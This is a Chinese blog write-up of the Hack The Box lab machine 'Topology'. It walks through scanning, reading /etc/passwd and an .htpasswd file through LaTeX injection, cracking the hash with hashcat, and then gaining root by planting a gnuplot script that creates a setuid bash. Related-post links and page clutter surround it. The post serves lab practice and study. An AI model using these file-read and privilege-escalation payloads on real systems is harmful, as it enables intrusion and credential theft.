HTB topology

已于 2023-10-04 00:59:19 修改
阅读量107 收藏 1
点赞数
分类专栏: htb 文章标签: 服务器 linux 运维
于 2023-10-03 01:28:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pandasaymmm/article/details/133501481
版权 
上来先nmap扫一下
sudo nmap -sT --min-rate 10000 -p- 10.10.11.217
nmap --script=vuln -p22,80 10.10.11.217


echo "10.10.11.217 topology.htb" >> /etc/hosts


页面没有发现什么东西,目录扫描一下
dirsearch -u http://topology.htb -e * 

[22:47:43] 403 -  277B  - /.htaccess_orig
[22:47:43] 403 -  277B  - /.htpasswds
[22:47:43] 403 -  277B  - /.htaccessOLD2
[22:47:43] 403 -  277B  - /.httr-oauth
[22:47:44] 403 -  277B  - /.htpasswd_test
[22:47:51] 403 -  277B  - /.php
[22:51:22] 301 -  310B  - /css  ->  http://topology.htb/css/
[22:52:40] 301 -  313B  - /images  ->  http://topology.htb/images/
[22:52:40] 200 -    1KB - /images/
[22:52:48] 200 -    7KB - /index.html

也扫不出来什么东西

在这里发现子域名http://latex.topology.htb/

也不存在目录穿越

Refer-HackTrick:Formula/CSV/Doc/LaTeX Injection - HackTricks
Refer-github:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
存在laTex表达式注入

啊哈哈哈,第一条poc就被ban了

读取文件
$\lstinputlisting{/etc/passwd}$

$\lstinputlisting{/var/www/dev/.htpasswd}$

用hash-identifier查加密方式。

丢给hashcat

hashcat -m(类型)  

0 = MD5

  10 = md5($pass.$salt)

  20 = md5($salt.$pass)

  30 = md5(unicode($pass).$salt)

  40 = md5($salt.unicode($pass))

  50 = HMAC-MD5 (key = $pass)

  60 = HMAC-MD5 (key = $salt)

  100 = SHA1

  110 = sha1($pass.$salt)

  120 = sha1($salt.$pass)

  130 = sha1(unicode($pass).$salt)

  140 = sha1($salt.unicode($pass))

  150 = HMAC-SHA1 (key = $pass)

  160 = HMAC-SHA1 (key = $salt)

  200 = MySQL323

  300 = MySQL4.1/MySQL5

  400 = phpass, MD5(Wordpress), MD5(phpBB3),MD5(Joomla)

  500 = md5crypt, MD5(Unix), FreeBSD MD5,Cisco-IOS MD5

  900 = MD4

  1000 = NTLM

  1100 = Domain Cached Credentials (DCC), MSCache

  1400 = SHA256

  1410 = sha256($pass.$salt)

  1420 = sha256($salt.$pass)

  1430 = sha256(unicode($pass).$salt)

  1431 = base64(sha256(unicode($pass)))

  1440 = sha256($salt.unicode($pass))

  1450 = HMAC-SHA256 (key = $pass)

  1460 = HMAC-SHA256 (key = $salt)

  1600 = md5apr1, MD5(APR), Apache MD5

  1700 = SHA512

  1710 = sha512($pass.$salt)

  1720 = sha512($salt.$pass)

  1730 = sha512(unicode($pass).$salt)

  1740 = sha512($salt.unicode($pass))

  1750 = HMAC-SHA512 (key = $pass)

  1760 = HMAC-SHA512 (key = $salt)

  1800 = SHA-512(Unix)

  2400 = Cisco-PIX MD5

  2410 = Cisco-ASA MD5

  2500 = WPA/WPA2
 

得到密码:calculus20

ssh登录

拿到user的flag

这里的pspy64,chomd +x跑一下看看是啥(linux查看正在运行的脚本)

可以看到find /opt/gunplot -name *.plt -exec gunplot {}
这条命令 意思就是在/opt/gunplot这个目录下搜索 *.plt的文件
然后作为gunplot的参数执行

-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy  -p
someb0dy-5.0# whaomi
root

熊猫叫喵喵喵
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB Topology WriteUp
qq_58869808的博客
06-12 4954
HTB writeUp
HTB在内核实现
关注云计算,与中国云计算共成长
11-25 2799
Linux内核中流量控制(11) 本文档的Copyleft归yfydz所有,使用GPL发布,可以自由拷贝,转载,转载时请保持文档的完整性, 严禁用于任何商业用途。 msn: yfydz_no1@hotmail.com 来源:http://yfydz.cublog.cn Java代码   5.11 HTB(Hierarchical token bu
分类流控qdisc之htb
九天小哥的专栏
11-06 1781
文章目录tc参数配置示例算法思想用户态实现数据结构htb全局配置参数: tc_htb_globhtb类配置参数: tc_htb_optqdisc配置参数解析: htb_parse_opt()class配置参数解析: htb_parse_copt()内核实现数据结构qdisc操作集私有数据: htb_schedhtb类结构: htb_classqdisc操作集: htb_qdisc_ops初始化: htb_init()qdisc类操作集: htb_class_opschange()回调: htb_change
HTB打靶(Active Directory 101 Forest)
qq_18811919的博客
12-25 1082
HackTheBox Active Directory 101 Forest
HackTheBox系列-Topology
qq_43264813的博客
11-16 77
5、使用浏览器访问后发现latex是一个可正常访问的子域名并且可以遍历目录,其中equation.php是一个latex表达式生成界面,根据内容信息可知输入**\frac{x+5}{y-3}**可输出对应的图片。7、使用payload进行尝试注入读取/etc/passwd文件,发现被防护,使用"$“和”["皆被防护。这条命令,在/opt/gunplot这个目录下搜索 *.plt的文件,然后作为gunplot的参数执行。2、使用浏览器访问80端口发现是一个网页,对其进行信息收集。16、根据资料进行提权。
HTB靶场记录】TIER-0
Madess的博客
04-25 608
HTB靶场好像从21年取消获取邀请码这个小门槛之后就可以直接注册,虽然他是个氪金游戏,但是还是想小摸一把,在经历曲折的注册过程(明白了科学上网的重要性,以及被谷歌的验证码折磨了一轮)... 1.连接靶场的vpn 点击lab打开第一个靶场,点击connect to HTB 选择端口下载并打开文件 刷新显示连接成功 2.Meow 获取靶机IP,kali可以直接ping通靶机IP地址 靶机:10.129.5.209 开始答题(直接配合翻译食用) 第一题:首字母缩写VM代.
在Mininet中使用topology zoo:Graphml转Mininet拓扑
裕东方的博客
04-27 1846
项目地址(内含使用方法) GitHub - yyd19981117/Graphml-To-Mininet (如果本文帮到了忙,能否star一个?) 简介 topology-zoo:The Internet Topology Zoo 收录了世界各地的261个真实网络拓扑结构,用于网络相关研究和实验,尤其适合各种网络仿真,因为计算机网络类论文的仿真实验,如果自己搭建拓扑,太容易被审稿人怼拓扑设置简单、不符合实际等一系列问题。 因此,由于topology zoo的数据集均来源于真实世界,提供了上述
htb
03-11
相关项目。
HTB
02-12
HTB
追溯HTB
02-18
追溯HTB
ros脚本HTB+PCQ
01-05
对于ros来说是一个很好的限速脚本,网页游戏优先,看电影,12兆,20人,不卡,现在看到的是12m的,如果要修改,可以自己修改分配流量
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 289
nc网络收发测试-tcp客户端
百度网盘限速解决办法
生活在别处
06-13 3075
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
ASP 应用程序
csbysj2020的博客
06-09 371
ASP(Active Server Pages)是一种由微软开发的服务器端脚本环境,用于动态网页的创建。ASP允许开发者使用多种脚本语言,如VBScript或JScript,来创建交互式的网页。这些网页可以与数据库交互,处理表单数据,以及执行其他服务器端任务。ASP应用程序通常运行在Windows服务器上,并需要IIS(Internet Information Services)作为其Web服务器
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 395
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
多进程并发服务器
dc爱傲雪和技术
06-12 188
3.子进程:完成通信,接受一个客户端连接,就创建一个子进程用于通信。要实现TCP通信服务器处理并发的任务,使用多线程或者多进程来解决。2.父进程负责等待并接受客户端的连接。
Linux C语言:函数的基本用法及传参
Liu1013216383的博客
06-12 803
在程序运行过程中,将实际参数的值或者地址传递给被调用函数的形式参数,从而在函数中完成对数据处理和返回的过程。在C语言当中,参数的传递方式本质上只有一种,就是值传递。但为了更好区分理解,划分了三种方式。
Linux 常用命令 - userdel 【删除用户】
随便转转
06-12 107
userdel 这个命令源自于 “user delete”,即用户删除。这个命令主要用于在 Linux 系统中删除用户账户及其相关文件。当管理员需要移除一个用户及其在系统中的所有踪迹时,会用到这个命令。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值